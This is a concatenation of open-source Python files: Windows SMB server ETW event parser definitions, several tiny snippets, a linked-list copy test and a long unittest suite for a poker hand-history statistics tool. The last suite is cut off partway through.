"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1802, version=0)
class Microsoft_Windows_SMBServer_1802_0(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1803, version=0)
class Microsoft_Windows_SMBServer_1803_0(Etw):
pattern = Struct(
"DescriptorName" / WString
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1804, version=1)
class Microsoft_Windows_SMBServer_1804_1(Etw):
pattern = Struct(
"Days" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1900, version=0)
class Microsoft_Windows_SMBServer_1900_0(Etw):
pattern = Struct(
"IsTdiEnabled" / Int8ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1901, version=0)
class Microsoft_Windows_SMBServer_1901_0(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1902, version=0)
class Microsoft_Windows_SMBServer_1902_0(Etw):
pattern = Struct(
"AddressFamily" / Int32ul,
"NetLuid" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1903, version=0)
class Microsoft_Windows_SMBServer_1903_0(Etw):
pattern = Struct(
"AddressFamily" / Int32ul,
"NetLuid" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1904, version=0)
class Microsoft_Windows_SMBServer_1904_0(Etw):
pattern = Struct(
"NetLuid" / Int64ul,
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1905, version=0)
class Microsoft_Windows_SMBServer_1905_0(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"InstanceId" / Int32ul,
"Reason" / WString
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=2000, version=0)
class Microsoft_Windows_SMBServer_2000_0(Etw):
pattern = Struct(
"ReassembledEventID" / Int16ul,
"FragmentSize" / Int32ul,
"FragmentData" / Bytes(lambda this: this.FragmentSize)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=3000, version=0)
class Microsoft_Windows_SMBServer_3000_0(Etw):
pattern = Struct(
"ClientName" / CString
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=3002, version=1)
class Microsoft_Windows_SMBServer_3002_1(Etw):
pattern = Struct(
"ClientName" / CString
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=3003, version=1)
class Microsoft_Windows_SMBServer_3003_1(Etw):
pattern = Struct(
"Days" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=40000, version=0)
class Microsoft_Windows_SMBServer_40000_0(Etw):
pattern = Struct(
"ConnectionType" / Int32ul,
"PeerAddressLength" / Int32ul,
"PeerAddress" / Bytes(lambda this: this.PeerAddressLength),
"PacketSize" / Int32ul,
"PacketData" / Bytes(lambda this: this.PacketSize)
)
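The field layouts above repeat one wire-format idiom: a little-endian 16-bit (`Int16ul`) or 32-bit (`Int32ul`) length immediately followed by that many raw bytes, as in the `FileNameLength`/`FileName` pairs. The module itself relies on the `construct` library's `Struct`/`Bytes` for this; the sketch below is a hypothetical stdlib-only decoder of the same layout (the helper name and the sample strings are illustrative, not part of this module):

```python
import struct

def parse_length_prefixed(buf, names, width="H"):
    """Decode consecutive (length, raw bytes) pairs from buf.

    width is the struct format character of the length field:
    "H" for Int16ul, "I" for Int32ul, matching the *Length fields above.
    """
    out, off = {}, 0
    for name in names:
        (n,) = struct.unpack_from("<" + width, buf, off)
        off += struct.calcsize("<" + width)
        out[name] = buf[off:off + n]  # raw payload bytes for this field
        off += n
    return out

# Build a sample payload shaped like the first two fields of event 658:
# FileNameLength/FileName then UserNameLength/UserName (UTF-16LE text,
# as ETW unicode strings are encoded on the wire).
payload = b""
for text in ("share.txt", "alice"):
    raw = text.encode("utf-16-le")
    payload += struct.pack("<H", len(raw)) + raw

fields = parse_length_prefixed(payload, ["FileName", "UserName"])
print(fields["UserName"].decode("utf-16-le"))  # prints "alice"
```

The `Bytes(lambda this: this.FileNameLength)` expressions in the classes above do the same slice, with `construct` resolving the length field parsed just before it.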
# ---- examples/py30-0022-backticks6.py (repo: jwilk-forks/python-grammar-changes, MIT) ----
`1,2,3`
# ---- test.py (repo: bokonV2/TopUsersVkWeb, MIT) ----
print("\u0443\u0441\u043f\u0435\u0448\u043d\u043e")  # prints the Russian word for "successfully"
# ---- test/integration/tfp/models_data/test_disc_binary_data.py (repo: spinkney/stanc3, BSD-3-Clause) ----
data = dict(y_bern = [0,0,0,0,0,1,1,1,1,0])
# ---- pywicta/io/__init__.py (repo: jeremiedecock/pywi-cta, MIT) ----
"""Input/output modules
This package contains modules used to load and save data (mostly images).
"""
from . import geometry_converter
from . import images
from . import simtel
# ---- cython_mcpp/__init__.py (repo: molpopgen/cython_mcpp, Apache-2.0) ----
from .get_includes import get_includes
# ---- challenge_8/python/mjuiuc/test.py (repo: rchicoli/2017-challenges, Apache-2.0) ----
import unittest
import random
import time
from listNode import listNode
from solution import solution
class Tests(unittest.TestCase):
def test1(self):
# create linked list
temp = listNode()
head = temp
lop = list()
for i in xrange(1,11):
lop.append(temp)
temp.val = i
temp.next = listNode()
temp = temp.next
# assign random pointers
temp2 = head
while temp2 != None:
temp2.random = lop[random.randint(0,9)]
temp2 = temp2.next
# get the copied list head
t1 = time.time()
copiedHead = solution(head)
t2 = time.time()
# can't figure out a nice way to check the random pointers..
for i in lop:
# the actual test happens here
assert copiedHead.val == head.val, "error in value"
assert copiedHead.random.val == head.random.val, "error in random value"
copiedHead = copiedHead.next
head = head.next
print 'Runtime of test1: ' + str(t2 - t1)
def test2(self):
# create linked list
temp = listNode()
head = temp
lop = list()
for i in xrange(1,10001):
lop.append(temp)
temp.val = i
temp.next = listNode()
temp = temp.next
# assign random pointers
temp2 = head
while temp2 != None:
temp2.random = lop[random.randint(0,9999)]
temp2 = temp2.next
# get the copied list head
t1 = time.time()
copiedHead = solution(head)
t2 = time.time()
# can't figure out a nice way to check the random pointers..
for i in lop:
# the actual test happens here
assert copiedHead.val == head.val, "error in value"
assert copiedHead.random.val == head.random.val, "error in random value"
copiedHead = copiedHead.next
head = head.next
print 'Runtime of test2: ' + str(t2 - t1)
def test3(self):
# create linked list
temp = listNode()
head = temp
lop = list()
for i in xrange(1,100001):
lop.append(temp)
temp.val = i
temp.next = listNode()
temp = temp.next
# assign random pointers
temp2 = head
while temp2 != None:
temp2.random = lop[random.randint(0,99999)]
temp2 = temp2.next
# get the copied list head
t1 = time.time()
copiedHead = solution(head)
t2 = time.time()
# can't figure out a nice way to check the random pointers..
for i in lop:
# the actual test happens here
assert copiedHead.val == head.val, "error in value"
assert copiedHead.random.val == head.random.val, "error in random value"
copiedHead = copiedHead.next
head = head.next
print 'Runtime of test3: ' + str(t2 - t1)
if __name__ == '__main__':
unittest.main()
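The suite above times `solution(head)`, a deep copy of a singly linked list whose nodes carry an extra `random` pointer into the same list. A minimal dictionary-based sketch of that copy, written in Python 3 (with a hypothetical `Node` class standing in for the repo's `listNode`; the repo's own `solution` may differ):

```python
class Node(object):
    def __init__(self, val=0):
        self.val = val
        self.next = None
        self.random = None

def copy_random_list(head):
    # Pass 1: clone every node, remembering original -> clone.
    # Mapping None -> None lets pass 2 handle terminal pointers uniformly.
    clones = {None: None}
    cur = head
    while cur is not None:
        clones[cur] = Node(cur.val)
        cur = cur.next
    # Pass 2: rewire next/random pointers through the mapping.
    cur = head
    while cur is not None:
        clones[cur].next = clones[cur.next]
        clones[cur].random = clones[cur.random]
        cur = cur.next
    return clones[head]

# Tiny demo: 1 -> 2, where node 1's random pointer targets itself.
a, b = Node(1), Node(2)
a.next = b
a.random = a
copy_ = copy_random_list(a)
print(copy_.val, copy_.random is copy_)  # prints "1 True"
```

This is O(n) time and O(n) extra space; the tests above only check `val` and `random.val`, which this mapping preserves by construction.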
# ---- testy/testyAll.py (repo: sfera2/Poker_DB_Creator, MIT) ----
import unittest
import sys
import os
f = os.getcwd()[:-5]  # strip the trailing "testy" directory to get the project root
sys.path.append(f)  # so Action.py in the project root is importable
from Action import *
class TestReka(unittest.TestCase):
def test_ai(self):
        # folder where the correct answers are
folder = f + '/testy/rece/'
file = 'bug_ai.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
self.assertEqual('FLOP', hand.get_ai_street(), msg=file)
plrs = [str(p) for p in hand.get_players_ai_street('preflop')]
self.assertEqual(['fidas1972'], plrs,
msg=file)
plrs = [str(p) for p in hand.get_players_ai_street('flop')]
self.assertEqual(sorted(['fidas1972', 'Eddys Edge']), sorted(plrs),
msg=file)
plrs = [str(p) for p in hand.get_players_ai_street('turn')]
self.assertEqual(sorted(['Eddys Edge', 'fidas1972']), sorted(plrs),
msg=file)
file = 'ai.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
self.assertEqual('FLOP', hand.get_ai_street(), msg=file)
plrs = [str(p) for p in hand.get_players_ai()]
self.assertEqual(sorted(['Chodemuncher', 'Krumi1703']), sorted(plrs),
msg=file)
file = 'caip.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
self.assertEqual('PREFLOP', hand.get_ai_street(), msg=file)
plrs = [str(p) for p in hand.get_players_ai()]
self.assertEqual(sorted(['zambow20', 'fmljegvinder']), sorted(plrs),
msg=file)
class TestPreflop(unittest.TestCase):
def test_open_opp(self):
        # folder where the correct answers are
folder = f + '/testy/rece/'
file = '__P__FFFLIFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
file = '__P__FFFLFIF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(), msg=file + ' ' + player)
file = '__P__FFRFRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
file = '__P__FFFOFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
    def test_open_(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        cases = {
            '__P__FFFLIFF.txt': {'g3': False, 'g4': False, 'g5': False, 'g6': False},
            '__P__FFRFRFF.txt': {'g3': True, 'g4': False, 'g5': False, 'g6': False},
            '__P__FFFOFF.txt': {'g2': False, 'g3': False, 'g4': True, 'g5': False},
        }
        for file, expected in cases.items():
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for player, result in expected.items():
                with self.subTest(file=file, player=player):
                    self.assertEqual(result, Preflop(hand, player).open_(),
                                     msg=file + ' ' + player)
    def test_izo_opp(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        cases = {
            '__P__FFFLFIF.txt': {'g3': False, 'g4': False, 'g5': True, 'g6': True},
            '__P__FLFIFFF.txt': {'g1': False, 'g2': False, 'g3': True, 'g4': True},
            '__P__LLFIFFFF.txt': {'g1': False, 'g2': True, 'g3': True, 'g4': True},
            '__P__LLIFFFFF.txt': {'g1': False, 'g2': True, 'g3': True, 'g4': False},
            '__P__FOFFFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': False},
        }
        for file, expected in cases.items():
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for player, result in expected.items():
                with self.subTest(file=file, player=player):
                    self.assertEqual(result, Preflop(hand, player).izo_opp(),
                                     msg=file + ' ' + player)
    def test_izo(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        cases = {
            '__P__FFFLFIF.txt': {'g3': False, 'g4': False, 'g5': False, 'g6': True},
            '__P__FLFIFFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': True},
            '__P__LLFIFFFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': True},
            '__P__LLIFFFFF.txt': {'g1': False, 'g2': False, 'g3': True, 'g4': False},
            '__P__FOFFFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': False},
        }
        for file, expected in cases.items():
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for player, result in expected.items():
                with self.subTest(file=file, player=player):
                    self.assertEqual(result, Preflop(hand, player).izo(),
                                     msg=file + ' ' + player)
    def test_three_bet_opp(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        cases = {
            '__P__FOFRFFF.txt': {'g1': False, 'g2': False, 'g3': True, 'g4': True},
            '__P__FOCRFFFF.txt': {'g1': False, 'g2': False, 'g3': True, 'g4': False},
            '__P__LIFRFFFF.txt': {'g1': False, 'g2': False, 'g3': True, 'g4': True},
            '__P__LICFFFF.txt': {'g1': False, 'g2': False, 'g3': True, 'g4': False},
        }
        for file, expected in cases.items():
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for player, result in expected.items():
                with self.subTest(file=file, player=player):
                    self.assertEqual(result, Preflop(hand, player).three_bet_opp(),
                                     msg=file + ' ' + player)
    def test_three_bet(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        cases = {
            '__P__FOFRFFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': True},
            '__P__FOCRFFFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': False},
            '__P__LIFRFFFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': True},
            '__P__LICFFFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': False},
        }
        for file, expected in cases.items():
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for player, result in expected.items():
                with self.subTest(file=file, player=player):
                    self.assertEqual(result, Preflop(hand, player).three_bet(),
                                     msg=file + ' ' + player)
    def test_three_bet_def_opp(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        cases = {
            '__P__FOFRFFF.txt': {'g1': False, 'g2': True, 'g3': False, 'g4': False},
            '__P__FOFRFFC.txt': {'g1': False, 'g2': True, 'g3': False, 'g4': False},
            '__P__FOFRFFRF.txt': {'g1': False, 'g2': True, 'g3': False, 'g4': False},
            '__P__FOCRFFFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': False},
            '__P__FOCRFFCRFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': False},
            '__P__LIFRFFFRF.txt': {'g1': False, 'g2': True, 'g3': False, 'g4': False},
            '__P__LIFRFFFC.txt': {'g1': False, 'g2': True, 'g3': False, 'g4': False},
            '__P__LIFRFFCC.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': False},
            '__P__LIFRFFCRFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': False},
        }
        for file, expected in cases.items():
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for player, result in expected.items():
                with self.subTest(file=file, player=player):
                    self.assertEqual(result, Preflop(hand, player).three_bet_def_opp(),
                                     msg=file + ' ' + player)
    def test_enum_three_bet_def(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        cases = {
            '__P__FOFRFFF.txt': {'g1': None, 'g2': 'fold', 'g3': None, 'g4': None},
            '__P__FOFRFFC.txt': {'g1': None, 'g2': 'call 3bet', 'g3': None, 'g4': None},
            '__P__FOFRFFRF.txt': {'g1': None, 'g2': '4bet', 'g3': None, 'g4': None},
            '__P__FOCRFFFF.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': None},
            '__P__FOCRFFCRFF.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': None},
            '__P__LIFRFFFRF.txt': {'g1': None, 'g2': '4bet', 'g3': None, 'g4': None},
            '__P__LIFRFFFC.txt': {'g1': None, 'g2': 'call 3bet', 'g3': None, 'g4': None},
            '__P__LIFRFFCC.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': None},
            '__P__LIFRFFCRFF.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': None},
        }
        for file, expected in cases.items():
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for player, result in expected.items():
                with self.subTest(file=file, player=player):
                    self.assertEqual(result, Preflop(hand, player).enum_three_bet_def(),
                                     msg=file + ' ' + player)
    def test_four_bet_def_opp(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        cases = {
            '__P__FOFRFFRF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': True},
            '__P__FOFRFFRC.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': True},
            '__P__FOCRFFFRF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': True},
            '__P__FOCRFFFRRF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': True},
            '__P__FOCRFFRFRF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': True},
            '__P__FOCRFFRFC.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': True},
            '__P__FOCRFFCRFF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': False},
            '__P__FOCRFFRCF.txt': {'g1': False, 'g2': False, 'g3': False, 'g4': False},
        }
        for file, expected in cases.items():
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for player, result in expected.items():
                with self.subTest(file=file, player=player):
                    self.assertEqual(result, Preflop(hand, player).four_bet_def_opp(),
                                     msg=file + ' ' + player)
    def test_enum_four_bet_def(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        cases = {
            '__P__FOFRFFRF.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': 'fold'},
            '__P__FOFRFFRC.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': 'call 4bet'},
            '__P__FOCRFFFRF.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': 'fold'},
            '__P__FOCRFFFRRF.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': '5bet'},
            '__P__FOCRFFRFRF.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': '5bet'},
            '__P__FOCRFFRFC.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': 'call 4bet'},
            '__P__FOCRFFCRFF.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': None},
            '__P__FOCRFFRCF.txt': {'g1': None, 'g2': None, 'g3': None, 'g4': None},
        }
        for file, expected in cases.items():
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for player, result in expected.items():
                with self.subTest(file=file, player=player):
                    self.assertEqual(result, Preflop(hand, player).enum_four_bet_def(),
                                     msg=file + ' ' + player)
    def test_cold_four_bet_opp(self):
        # folder containing the expected answers
        folder = f + '/testy/rece/'
        cases = {
            '__P__ORFRFFFF.txt': {'g1': False, 'g2': False, 'g3': True, 'g4': True},
            '__P__ORCRFFFFF.txt': {'g1': False, 'g2': False, 'g3': True, 'g4': False},
            '__P__ORCCFFF.txt': {'g1': False, 'g2': False, 'g3': True, 'g4': False},
        }
        for file, expected in cases.items():
            with open(folder + file) as data:
                hand = Reka(data.readlines())
            for player, result in expected.items():
                with self.subTest(file=file, player=player):
                    self.assertEqual(result, Preflop(hand, player).cold_four_bet_opp(),
                                     msg=file + ' ' + player)
def test_cold_four_bet(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__ORFRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.cold_four_bet(), msg=file + ' ' + player)
file = '__P__ORCRFFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
file = '__P__ORCCFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
    def test_cold_four_bet_def_opp(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__ORRFFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
        file = '__P__ORRFFFFC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
        file = '__P__ORRFFFCC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)

    def test_enum_cold_four_bet_def(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__ORRFFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual('fold', tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
        file = '__P__ORRFFFFC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual('call 4bet', tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
        file = '__P__ORRFFFCC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
    def test_flat_opp(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__OFCRFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.flat_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.flat_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.flat_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.flat_opp(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.flat_opp(), msg=file + ' ' + player)
        file = '__P__FOFCFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.flat_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.flat_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.flat_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.flat_opp(), msg=file + ' ' + player)

    def test_flat(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__OFCRFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.flat(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
        file = '__P__FOFCFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.flat(), msg=file + ' ' + player)
    def test_sqz_opp(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__FOFRFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
        file = '__P__FOCRFFRFC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_opp(), msg=file + ' ' + player)
        file = '__P__FOCCFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
